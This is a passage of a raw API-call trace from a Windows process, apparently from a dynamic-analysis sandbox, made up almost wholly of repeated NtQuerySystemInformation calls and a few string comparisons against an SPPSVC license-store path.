SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.458] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.462] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.478] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.479] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.480] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.484] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eec0, Length=0x28, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x28, ResultLength=0x0) [0240.489] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x28, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f080, Length=0x28, ResultLength=0x0) [0240.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f080, Length=0x28, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x20, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x20, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x20, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x20, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x20, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1b0, Length=0x28, ResultLength=0x0) [0240.498] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f230, Length=0x50, ResultLength=0x0) [0240.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef90, Length=0x28, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f000, Length=0x28, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.503] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f080, Length=0x28, ResultLength=0x0) [0240.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f080, Length=0x28, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x20, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x20, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x20, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef60, Length=0x20, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f160, Length=0x38, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efe0, Length=0x20, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef70, Length=0x20, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.507] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.507] 